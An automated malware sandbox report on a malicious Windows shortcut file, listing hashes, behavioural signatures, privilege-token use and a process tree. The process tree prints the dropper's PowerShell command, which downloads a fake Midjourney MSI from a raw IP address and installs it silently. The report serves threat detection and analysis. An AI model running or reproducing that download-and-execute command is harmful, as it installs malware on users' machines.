Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
03-10-2024 12:45
Static task
static1
Behavioral task
behavioral1
Sample
Report-41952.lnk
Resource
win7-20240708-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Report-41952.lnk
-
Size
3KB
-
MD5
2aed3939fbf8f1967d68fcc746771889
-
SHA1
eb04819a97ca2cf33211c6ea323a9c77cdfacfcf
-
SHA256
106c81f547cfe8332110520c968062004ca58bcfd2dbb0accd51616dd694721f
-
SHA512
0d45000b7a470655668e5c0c95aaab3911b75b3f4163abb02f9b6e987e070ad02af144d5f791ebf6940c5c838f35ff55f7c0b906ade62f47dde6ad9ff1750b1c
Score
8/10
Malware Config
Signatures
-
pid Process 2836 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 2836 powershell.exe Token: SeShutdownPrivilege 1936 msiexec.exe Token: SeIncreaseQuotaPrivilege 1936 msiexec.exe Token: SeRestorePrivilege 3028 msiexec.exe Token: SeTakeOwnershipPrivilege 3028 msiexec.exe Token: SeSecurityPrivilege 3028 msiexec.exe Token: SeCreateTokenPrivilege 1936 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1936 msiexec.exe Token: SeLockMemoryPrivilege 1936 msiexec.exe Token: SeIncreaseQuotaPrivilege 1936 msiexec.exe Token: SeMachineAccountPrivilege 1936 msiexec.exe Token: SeTcbPrivilege 1936 msiexec.exe Token: SeSecurityPrivilege 1936 msiexec.exe Token: SeTakeOwnershipPrivilege 1936 msiexec.exe Token: SeLoadDriverPrivilege 1936 msiexec.exe Token: SeSystemProfilePrivilege 1936 msiexec.exe Token: SeSystemtimePrivilege 1936 msiexec.exe Token: SeProfSingleProcessPrivilege 1936 msiexec.exe Token: SeIncBasePriorityPrivilege 1936 msiexec.exe Token: SeCreatePagefilePrivilege 1936 msiexec.exe Token: SeCreatePermanentPrivilege 1936 msiexec.exe Token: SeBackupPrivilege 1936 msiexec.exe Token: SeRestorePrivilege 1936 msiexec.exe Token: SeShutdownPrivilege 1936 msiexec.exe Token: SeDebugPrivilege 1936 msiexec.exe Token: SeAuditPrivilege 1936 msiexec.exe Token: SeSystemEnvironmentPrivilege 1936 msiexec.exe Token: SeChangeNotifyPrivilege 1936 msiexec.exe Token: SeRemoteShutdownPrivilege 1936 msiexec.exe Token: SeUndockPrivilege 1936 msiexec.exe Token: SeSyncAgentPrivilege 1936 msiexec.exe Token: SeEnableDelegationPrivilege 1936 msiexec.exe Token: SeManageVolumePrivilege 1936 msiexec.exe Token: SeImpersonatePrivilege 1936 msiexec.exe Token: SeCreateGlobalPrivilege 1936 msiexec.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1972 wrote to memory of 2836 1972 cmd.exe 31 PID 1972 wrote to memory of 2836 1972 cmd.exe 31 PID 1972 wrote to memory of 2836 1972 cmd.exe 31 PID 2836 wrote to memory of 1936 2836 powershell.exe 32 PID 2836 wrote to memory of 1936 2836 powershell.exe 32 PID 2836 wrote to memory of 1936 2836 powershell.exe 32 PID 2836 wrote to memory of 1936 2836 powershell.exe 32 PID 2836 wrote to memory of 1936 2836 powershell.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Report-41952.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://193.242.145.138/mid/w1/Midjourney.msi" -OutFile "C:\Users\Admin\AppData\Roaming\y.msi";msiexec /i C:\Users\Admin\AppData\Roaming\y.msi /qn2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Roaming\y.msi /qn3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028